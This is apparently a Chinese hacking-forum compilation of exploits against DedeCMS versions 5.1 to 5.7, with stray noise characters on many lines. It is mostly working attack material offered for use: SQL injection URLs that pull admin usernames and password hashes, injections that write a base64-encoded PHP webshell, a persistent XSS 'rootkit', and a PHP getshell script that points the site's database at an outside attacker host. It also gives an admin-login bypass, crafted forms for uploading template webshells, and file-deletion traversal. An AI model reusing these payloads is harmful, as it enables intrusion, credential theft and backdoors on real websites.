|
|
% z0 j- U8 g. L$ t/ |- J: @Dedecms 5.6 rss注入漏洞, ]) E" ?! j( I
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
: w" P! J# w1 L7 T* x3 e. ?7 p+ N) m% E9 g1 F" ^2 c
u/ o2 c: ^; U7 W( ? }/ \' D' d/ R7 ?5 r& w7 t- U8 n$ w+ l* a. {; G
% c J2 Y$ R* O3 R# I5 ]$ o; A
: Z' O% H0 m# |0 N. h r" F% _7 W8 E5 d( W; h3 {: M
/ F0 v; H' j$ K5 u9 S9 ]- f5 h
6 e6 x3 }5 H5 CDedeCms v5.6 嵌入恶意代码执行漏洞
6 u4 ^+ g: S6 u注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}1 A8 |9 M& s% h. S5 j" b2 a) |! S
发表后查看或修改即可执行. |2 n1 r6 T2 I+ A2 o! C
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
+ z" O0 q4 ^" z% J) P# O生成x.php 密码xiao,直接生成一句话。 v& Q2 k: }; U- @9 r
) `; _' {" {. v+ I
4 _/ D1 W$ X. A( K; K* Q3 @& o) q' @3 p. S
4 ?/ `) d; q" A
/ u5 R/ n9 `& u, ?- k
. P) H9 K- {. ~1 u: Q2 W- g
8 p1 c% i f Q9 ]
; M& E3 o1 M" I" l# lDede 5.6 GBK SQL注入漏洞
' Z4 c1 {/ I* U2 Hhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';4 m: }8 Z6 C" w0 b1 V2 \% M. `, S
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe; i3 d0 w. @& i. _
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
! S3 P. f$ s& A& z
+ A* c- G' O- a% k, ?! C @5 [
( Y" T) a" w0 w, n, w
9 `" h, ]5 _' C% Y8 R% z
: r2 w* N# g. ?5 w9 [
* k$ H8 h% [, w/ _* p$ K/ T
7 [/ ~* F# R$ ]) R+ f. ?3 }/ C* v; t- a- P
8 R- P v* [2 w' v
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞. y+ a5 R$ }, u& \1 ~
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
0 R' j$ ?) B0 d A" q" i+ R: D7 ]- O
5 K8 p% H2 z# B) i. |
& J6 Q. `: N, B2 m5 T) Z) R
* Q0 S/ c4 W6 t0 p
( b' r& q* }0 |; n: z+ }/ f
+ S/ J4 H& K! [. c) m! ?+ j
DEDECMS 全版本 gotopage变量XSS漏洞
% P- P$ m3 }, T- S+ J( B; a9 p1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 3 ~6 S% F: H" t% M
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
' T2 c' A. k9 m2 h3 ~5 L, y# b- Z: l) z- }) H
]2 {( C, ^# o! n$ r! p
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
/ i2 n8 ^4 S! phttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
2 c% u2 c; P# \/ k* r+ ~/ o' E( \1 ]2 B3 \
) V2 v0 e& ^ M/ h# jhttp://v57.demo.dedecms.com/dede/login.php
, t6 F/ X& q1 Q, U h9 i+ I; X$ `0 X6 W8 q$ }3 _; B) [
$ U& b; |# u- Z zcolor=Red]DeDeCMS(织梦)变量覆盖getshell' I. J, d: M' p* O! d1 f- y1 l
#!usr/bin/php -w3 k. w6 E- ^; G7 {! X) z0 e
<?php6 ] V' t# U/ D J
error_reporting(E_ERROR);
) ]4 y7 W0 c% J7 ]7 L9 l/ Lset_time_limit(0);- r9 E" f: d# F& H+ q4 ?9 n
print_r('0 b4 j- |: ^0 @
DEDEcms Variable Coverage
$ q) d. d9 Q5 m" Q1 M3 `Exploit Author: www.heixiaozi.comwww.webvul.com$ [% h- ^; C: E6 {2 b9 b* |
);
4 q) s, N4 v" i; c( H( uecho "\r\n";- E0 Q h5 ^2 F# K `4 H: o
if($argv[2]==null){
2 W! m( j5 z; F* q2 aprint_r('
9 S3 {& z$ ?) u- \7 k9 h+---------------------------------------------------------------------------+
' Q3 t \3 m7 q& [) Z% l# O4 sUsage: php '.$argv[0].' url aid path7 \3 A! t6 P$ W; _6 E1 [ P, s
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/: ]3 P% A7 a2 N" }* c$ Q6 A! h
Example:
; x) X1 P# d" V7 m4 |php '.$argv[0].' www.site.com 1 old$ t: @! E/ J- C/ X/ @
+---------------------------------------------------------------------------+
`9 Y3 j* u) B% A1 [');0 Y2 g' M5 D6 J
exit;2 k R1 ~% d8 K' j8 V
}& Z7 A/ K5 b( K
$url=$argv[1];9 N4 J2 T* M6 N( Z9 l# ~4 \
$aid=$argv[2];
2 j. a9 l, ~+ ]5 V' ^" o- V4 W& w$path=$argv[3];
, }) V% _4 Z4 d: o. ?+ k$ [+ Q$exp=Getshell($url,$aid,$path);
6 Z# s$ E# T. b! v7 }: \! wif (strpos($exp,"OK")>12){' Q+ l% T5 ~) b- ^! B! I$ H
echo "
, V2 Q2 b% m: T f. d2 Q: @* jExploit Success \n";
# e A v2 y% |. o: t* rif($aid==1)echo "6 d8 Y: d) K2 x$ C
Shell:".$url."/$path/data/cache/fuck.php\n" ;
' ^5 ]3 e! \0 M8 b
( B$ N; P1 v6 O& ?- S# X' i- D$ D" _
if($aid==2)echo "
9 U$ j1 g8 r! H& {# q0 KShell:".$url."/$path/fuck.php\n" ; F0 W: t* g+ @1 W
: O/ M' i3 I, k, g& n1 k
: Z9 o) k! o' {+ Z2 @2 Rif($aid==3)echo "
% h) f. ]4 x4 u* G# q9 h# S) _2 wShell:".$url."/$path/plus/fuck.php\n";
4 w- q' G/ \& I h* E# Z6 I; f2 q/ d7 t3 l+ G* l6 e! a
2 a) Q6 e) \: Z: z% m' v) M}else{
" [' h9 ?6 R: @: a4 u# \8 Lecho "
# }4 b" y8 Q$ h3 d2 a2 `; jExploit Failed \n";4 h, ]1 z* ~! F2 u
}
# p% t q8 p4 Q) Kfunction Getshell($url,$aid,$path){
4 d+ \, `2 ^8 ]" b" ?9 h' L h) r( U5 {$id=$aid;
; V w/ \5 U! d0 R. E$host=$url;; C% _- l6 z4 d( `9 l5 Z( y% @
$port="80";+ v; F( J" ?7 f: X
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";0 v3 c2 A; X% B# ~ M; }# H
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
0 W4 R, ?0 @1 R1 e$data .= "Host: ".$host."\r\n";
* d' t' J/ g: J' }3 ]$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
0 C3 w1 B: H) Y" L; }. M$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";& n. y! _) U# ?/ U5 V
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
2 ^! q. Q, K3 K//$data .= "Accept-Encoding: gzip,deflate\r\n";9 @8 y6 p- ?3 r& r1 M3 `$ W
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";6 c% |2 [/ D3 [: f* E8 P3 K, b9 T
$data .= "Connection: keep-alive\r\n";
) t1 v! H9 v, N$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
# d$ i; A) S; @$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
6 a* J' i2 z% |1 ^$data .= $content."\r\n";+ s3 y4 r0 o/ s' F9 \8 e
$ock=fsockopen($host,$port);4 M O% q% E! }; j
if (!$ock) {
3 k/ [% M$ R3 J/ `! Jecho " s; E! M: n4 P8 \
No response from ".$host."\n";- g/ p5 B \6 r' N! ]! q
}
8 W) ]5 m# I0 U% T& cfwrite($ock,$data);9 y5 A# \+ ~8 V% l; O; T, C# p; X
while (!feof($ock)) {
0 j+ u0 I$ H- w' F* W! C4 I$exp=fgets($ock, 1024);0 f+ s1 h/ A0 e' A# i7 z0 w
return $exp;; g; ] a6 G5 F2 [
}
) J0 @1 A5 D! K9 O}
0 x( y2 R" X" p$ l, S0 U0 I8 a: c, ` ?1 ]" m/ y4 A
. }( a _ _2 C/ L?>! n7 ?! S. y. a; K5 g
8 }# t' ]7 I# F; d1 e$ U+ z% m) J& a1 @' E5 Y
/ n, i- J% f& Z/ ~4 @2 @9 W8 [
9 J( l, { W5 G2 F3 u3 @4 G0 p% n* o% ]- K1 t+ b" }
5 X% ?: v: n8 f+ z( J
. X1 i- K, n- D' K! K* l E
" n/ h& p, U/ p `& U( J% L9 n5 Q# c O7 h9 k. a5 d2 S! u
7 M8 ?0 B$ ^! v
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)* Y$ r# r8 y+ F; ^& { h" W) Y
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
, d; f9 f9 l. G5 q6 \+ I" f, L/ F7 L- K& N* U( W# J; Q
9 O5 z( E/ x# k. d
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
# n* g! Q! R% K; b2 n" b" @3 N. I% L% g0 I2 o2 O( w
0 o7 }8 q8 d' W; Y
此漏洞的前提是必须得到后台路径才能实现/ i% r% z2 c, g) x. k
! C2 y- T) L4 `& ]4 O/ v% V# t( U
' A& A' q2 {, [1 j
+ v1 ^7 H5 u! ^7 z0 ~4 ?/ }0 {% ~; Z" S, c Y$ M
6 Z: F, b' {5 ?# v. k" S3 Z& F
8 }$ \# M6 z0 e9 h, j
5 q/ C8 K; D) ?* O! P
6 A" m7 H; W8 G- J# p g8 ]. J t4 h5 T
Dedecms织梦 标签远程文件写入漏洞
: b" u/ b' g2 X! G; t6 \; Z前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');3 A+ Q3 A( y; H0 I; }/ a
8 c3 }* k7 f, D- K% ^2 {8 |$ ^6 M: o7 I3 Y2 }9 d
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
. V0 ]6 T% U$ i) r<form action="" method="post" name="QuickSearch" id="QuickSearch">
3 f. e8 p/ A, F8 k& _/ N<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
, ~$ X0 M6 k* j. t" x<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />' w0 ~4 o3 u' R7 X2 y. [
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
/ ]* S9 h7 U! v0 Y8 X5 } g<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
& \. k9 R. @2 U' |- ~1 }. |, C<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
+ t. G3 j* K2 G: O5 N- M( Y<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />% D9 L4 j9 Y& ^$ R% G' ]. Q/ ~4 r
<input type="text" value="true" name="nocache" style="width:400">3 L/ Y2 h/ O: ~
<input type="submit" value="提交" name="QuickSearchBtn"><br />
) |$ G8 X5 s: n, |- C7 A</form>
) v7 r9 v6 e2 G- D" e' U<script>
* Q b1 H* I5 v7 ?2 jfunction addaction()
% t& e" _6 I9 D1 J{
. \1 W; s* Z7 M- Ddocument.QuickSearch.action=document.QuickSearch.doaction.value; m" R7 \+ H/ y
}
3 j& j& ?* [/ x) P9 e% n</script>
) y# m: d' e" ]' o* H) ~3 V+ c% c2 F: m
% S& H: s% ]! w, n
. C' U" E$ u6 \" w9 Y4 `6 \3 c, L8 q. T) z
( Y8 c+ O; ^( i' N# ~1 e
& r6 d4 M$ E1 ]8 _
/ v" Y/ }8 M" g
8 }& V K' R8 f9 t" h5 D$ j+ G
3 N q4 E6 z4 N" H
3 W/ T0 m, c; @1 H( J
DedeCms v5.6 嵌入恶意代码执行漏洞
2 b- `# x H; J9 P6 G9 A) \) h) \注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
3 Z; }9 L7 L5 X( B# @5 g& Y% Da{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
& h/ [ }* P- V1 f. b3 C% ?生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
! v& ~& G5 @9 t- Y5 g7 E0 }Dedecms <= V5.6 Final模板执行漏洞7 i" \& }/ _3 W' ?6 K8 a: Q
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是: k# ?+ R7 {( V0 n/ `
uploads/userup/2/12OMX04-15A.jpg) K3 y4 |. F% @9 Z$ ]+ ~
# e6 u3 M3 D9 ~- b7 s2 r0 f! P0 [7 D) o( O) [
模板内容是(如果限制图片格式,加gif89a):; i% i" A' M3 N7 F% u; \
{dede:name runphp='yes'}, V# h2 V) G" T ]
$fp = @fopen("1.php", 'a');
5 ]1 S" d2 c! f$ r$ U5 k" P! f@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");* O2 N6 X9 w. R6 _0 h* i' `
@fclose($fp);; A. x# r2 A0 a# p
{/dede:name}
) q! f ^; Y5 z: `. J2 修改刚刚发表的文章,查看源文件,构造一个表单:
- M* {- q* \. A) C7 Q- g<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data"> x. ~5 l: \ p! v2 L
<input type="hidden" name="dopost" value="save" />( t/ h5 k) f7 o0 u% c/ c5 p E
<input type="hidden" name="aid" value="2" />
: Z' T: _4 I1 S9 a+ R5 K X" p<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />6 |2 p1 y0 p R: p, s
<input type="hidden" name="channelid" value="1" />/ N! T4 V% U2 d; k: o+ x9 ~( p
<input type="hidden" name="oldlitpic" value="" />* ~, j7 q+ J4 }+ r
<input type="hidden" name="sortrank" value="1275972263" />
" y. }( C7 z6 I" i! c! _8 {/ `3 e4 B; E8 q& j( A C
( T7 ?: W6 w2 Y5 j<div id="mainCp"># k8 B* h ~ t% T0 a
<h3 class="meTitle"><strong>修改文章</strong></h3> ]' Y. B6 m7 `
4 E$ }$ ?" ?# C. T6 m; T& l
4 `' a6 A w7 Z, @, ^<div class="postForm">$ p+ T4 O7 M+ ?, q9 F% C
<label>标题:</label>! n% h4 T8 D1 O1 q8 W% O P7 I! i; }3 ?
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
2 a8 T, Q: m! e I: b! P+ ]2 [" S* Q- p) I% S2 D1 N: R6 V# q
6 n7 `/ c3 |# Z, g<label>标签TAG:</label>' n9 N# q' P. T$ j, J% N# _8 `* R$ B
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
$ i; Q8 |- m, D- R
9 c. Q. u$ b+ x7 M$ F* E3 b- ]& Q/ _/ y9 U1 v% i# @
<label>作者:</label>0 X8 l+ d* q) {- o& k! n; S9 w+ k
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
z! t' U$ E- }% s3 b5 m3 A7 f. m* e
& G; K2 X8 Z L! M f% f
# ~ o% C1 `+ L, @% W- {' y; @<label>隶属栏目:</label>( m- s' P6 ~2 x2 j& v8 R
<select name='typeid' size='1'>
& g; O4 k W0 T1 `<option value='1' class='option3' selected=''>测试栏目</option>
6 T0 N0 d* N! x! V</select> <span style="color:#F00">*</span>(不能选择带颜色的分类): |' q( R A& _5 {8 w7 N
$ U3 o1 m4 p& o4 w; w3 u2 O+ n4 D) S
3 L( X/ J, c; W6 H) ~6 k
<label>我的分类:</label>4 N4 v4 \4 s! `
<select name='mtypesid' size='1'>% ?1 n8 ]7 J( j7 v& i% U$ d
<option value='0' selected>请选择分类...</option>
# h: {7 z2 o9 u9 h<option value='1' class='option3' selected>hahahha</option>- y% n) E: m' g2 e0 J+ f ]( A
</select>! Q }5 w* W+ C* X6 Z- t, p, m. _
& T R+ b0 ^( `: s7 A9 [
% }0 b+ F: O5 a7 `3 S4 Q. I$ a<label>信息摘要:</label>) ?4 K5 c& f# O
<textarea name="description" id="description">1111111</textarea>
1 |* u8 w% W* U N# }(内容的简要说明)
: K5 ^/ V; f" _$ w8 P! z4 u: l. q! b- ]$ p. T
$ X! ] a' F6 J. Z/ _<label>缩略图:</label>/ T: G$ X! Q) r c z
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
. ?$ K& l1 Y3 O8 B& J, e
- H/ Y0 `3 P( a
, r8 l' D m+ [* J/ E' g6 H$ W<input type='text' name='templet'4 F6 L: c+ ]0 C6 A0 y
value="../ uploads/userup/2/12OMX04-15A.jpg">( W5 x/ Q9 h, X, S% }
<input type='text' name='dede_addonfields'" K1 F+ n: {' S& x% `+ J
value="templet,htmltext;">(这里构造)! @& {( x4 _, c: @& ^. v+ I+ r
</div># h% z& }+ B8 S3 x4 ]2 |7 U; M
' q: j: j$ g, l5 H
1 Q. f0 T5 E* F7 Y
<!-- 表单操作区域 -->7 \% I8 l* q5 l) w& x% n0 ]
<h3 class="meTitle">详细内容</h3>
7 V* |: a n& s. L2 g) b) _3 T* w- ]+ Q4 ~5 B @1 T7 h
7 ~/ V$ j$ G1 c! B. d% i<div class="contentShow postForm">
, k/ ^7 @: W9 D<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>' L: g* ?. M3 q- n% h3 t
) U" Y' D9 Y/ W9 s/ S8 X
N4 b% B. ?+ H+ s, Z; F# @
<label>验证码:</label> M+ [& Q( l k2 r& }2 G: {" w
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
* ] A+ M6 I4 h! I5 p<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
3 m: |) H: ~/ i! ^2 ]. t) T/ M9 `/ N/ ~. ~9 K" V% y
3 J; m! E1 z& C3 q$ n<button class="button2" type="submit">提交</button>6 U4 J& F y. G; O5 e. Z
<button class="button2 ml10" type="reset">重置</button>
/ G- c% g; ~6 A+ [0 X2 o; a</div>
, T4 Z4 n3 G Y' ~& Q; F7 m5 @# o/ `3 T: L4 Z! k' g
' U7 d3 g1 o$ n
</div>" B- R- Z4 e) G& f' u
0 z. K# T, B1 b6 j0 F% O% o% K) R( W- v
</form>% v! ~1 o; C( ]+ [* u! P H0 i3 S
' }2 g; g* W8 F0 {5 F: ]5 J" v) M! O6 m: V
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
9 r1 _8 i) @9 j% w假设刚刚修改的文章的aid为2,则我们只需要访问:
, B8 J1 h _/ P& N4 b% Vhttp://127.0.0.1/dede/plus/view.php?aid=2
, S/ P" |# j7 _4 b即可以在plus目录下生成webshell:1.php
; ?1 g5 ^( }: Y: k% Z, V+ D2 u
4 U% W, @6 M9 z( r) x( q( c% o& x# N/ G- B( d* B
7 J7 j" u! m# \- e: K5 M0 b. I7 t- b: G6 H
, t0 E$ M2 |( n4 f+ v5 t1 _( O1 S* t$ Q
5 S; v5 K! {% r
( [: ?6 h' ^: x7 ?" d$ m
% Q) C0 j/ D( |& ^5 I8 f
! p0 F- c% p4 e7 E% c! f0 K/ D9 B0 D' |3 U% a% _/ {
% }8 u% \ I8 ]7 r9 L1 k' K
# I- A$ e6 {* A1 D6 l+ [DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)/ ]6 T$ P/ V. P& Y% o% n8 _
Gif89a{dede:field name='toby57' runphp='yes'}
+ t" |* m3 ~& J1 @; S6 \$ Dphpinfo();; }" H* L( d) t o9 W( T
{/dede:field}
: b, J) ~9 c$ c' o保存为1.gif" p8 b; e! f; @& z' R8 v9 n5 V L
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ' C7 v7 S: e" n9 o
<input type="hidden" name="aid" value="7" /> * K: y8 P) c9 a6 n: H
<input type="hidden" name="mediatype" value="1" />
8 L M' K7 R) M<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
+ Q- W$ Q* B; d<input type="hidden" name="dopost" value="save" /> % N9 M) K/ D @* S6 @
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ' j- v% j) t6 `* v, {" w/ W# u
<input name="addonfile" type="file" id="addonfile"/>
7 J% M& T" [& t<button class="button2" type="submit" >更改</button>
5 | ~5 `& d) {. t+ B" g</form>
; e6 Q3 A' N% j. b* b: o3 N$ b; t$ B' _* o& j! u3 {
& E6 L8 |) @7 t$ R2 J5 b4 q构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
$ B* e5 @- I' w+ j1 f; r% q发表文章,然后构造修改表单如下:9 I( f. ]1 K" D
6 i& H/ P* @% j# |8 m0 p- e
8 K5 } L V0 D1 p<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 8 I" Q: O( B9 P* H6 h
<input type="hidden" name="dopost" value="save" />
5 }7 a" O# @8 g. I1 p @! g8 H<input type="hidden" name="aid" value="2" />
0 f* t4 e" j& s3 A* X% `- Z/ A<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 5 A; I8 o" ^# ~
<input type="hidden" name="channelid" value="1" />
" @4 I/ Q* T/ \9 S2 q) C# E+ y) B<input type="hidden" name="oldlitpic" value="" /> 7 n+ f/ @% o" z
<input type="hidden" name="sortrank" value="1282049150" /> 5 D% j+ e2 h" @# h* R
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
+ _" `: B! c# g0 Z' c }<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> - j' G0 R5 H0 {) @8 Z, u
<select name='typeid' size='1'> ' X: @0 ^$ z1 c2 z- d
<option value='1' class='option3' selected=''>Test</option> 8 j7 m7 E5 M1 y w& N
<select name='mtypesid' size='1'>
) |9 m+ p. O2 W. I0 H6 M* m( l<option value='0' selected>请选择分类...</option>
2 {1 x$ e2 W% U# e<option value='1' class='option3' selected>aa</option></select>
/ {5 Z7 P5 C/ P# r# Q<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> / T: b6 Y) B+ f# K5 H
<input type='hidden' name='dede_addonfields' value="templet">
+ Z7 a# \2 _& N5 s/ B$ [. C<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> ( V) p; Z+ O# X! F9 H' ]
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
# O$ A+ _/ C8 ^6 {+ q<button class="button2" type="submit">提交</button>
9 I; R7 T' x, F1 {3 f</form>
2 ]/ B8 |! p9 Q& R
& L9 b3 K* D- \+ P5 D/ m) }: @; y% O3 b f! l: @
% J% w5 _. y4 m
1 v" ^% [: w! `+ _/ w
; Y; x0 H" N+ W4 T* a
7 L) Q7 |$ o! u! d/ h: J
0 S9 j/ \' w( [: L* z1 V
+ c+ }* H) ]" [. p3 A( M1 Z; }
6 p' }4 G2 {% j3 {
+ n3 |: Z. e/ ?% {: H! R2 v, y
9 N& |4 J+ c; v$ V' P$ E* O' E6 A2 D3 k2 z4 u
织梦(Dedecms)V5.6 远程文件删除漏洞
M9 x0 f) t; {% P6 Hhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif: ?3 @$ F& V: g5 t1 p7 f: _
7 ]9 |7 g* C. ]& _$ H$ g' ]7 X3 a. D) X
& X+ T# N0 A$ @
' |6 v8 M4 M" t6 W6 {+ F9 T9 n" Y; ^( a( q% D" `% z: n" h
( r- \/ C& m' X% z$ E( l
7 }+ v6 o+ {) L5 T7 y
3 y/ x$ P# G+ R" B% H
, `# y& u7 N0 B. E! C' ?- d
. z) Q/ ?. G! Q" \织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
; Z& P4 s0 @# D% x+ [" t3 G& ~- `http://www.test.com/plus/carbuya ... urn&code=../../
* x7 ~9 g$ p1 m: M
$ |9 Z1 e3 w# P
1 b1 e0 g/ t4 \+ k2 O) {3 C, |( y' C5 o8 N) i
7 o5 b$ b* d0 ^" k" {& p$ Z( R. D8 L' c0 a$ r4 R% G+ N' v9 x
2 C% l5 Q8 @& |9 N1 \0 q! B4 t0 g/ {0 V9 y$ _9 t n: ?' R
3 p7 x: i) R1 R2 O0 f
2 I. T7 ` W1 ~$ |8 O- x6 S \# J7 n7 g7 a4 H3 \8 K
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 6 m& T# i. ^5 z/ w7 h. Q
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`& Y3 ^+ D' I' Y/ A: v
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
3 N2 z0 k' Y, g/ ^
8 |4 D2 f8 l" F5 Y5 @; x* v
/ I2 N# W: n k. m" d
y% Q' L& O @! j, P/ `
# y7 e; U; y. X/ ~4 h
7 V% k& G2 b% m, c9 [# l5 R/ Y* Y+ Q/ C1 X+ D' _& a
/ }6 @! y. H! D7 t. `3 V
; p( I9 E9 `' }2 L9 f! |* X
2 v+ H! Q" k2 u
" i1 \! V$ l" [3 w织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
' Q% n; B8 p# V! s Bhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
' y- j. Z) j7 l: v
2 A1 u& ~5 X; S8 I b' d" U* P/ E2 v7 W& G8 p0 `/ i
, d. ~4 E2 @; M# ~8 Q
# T3 H) E0 `& O4 h4 _0 [
]& R5 h( t3 `5 p/ @$ @ I) ]$ h% P* z; G) J3 K, X
( `0 X% \& V1 A# a2 g6 s
! w# U! I/ P I3 p' D- x% _
9 q) d7 l" w G; l# p" S0 ]
( m" a$ r- X1 @( A织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
' o" g, P& L0 W) v& m2 i% G# n5 O<html>
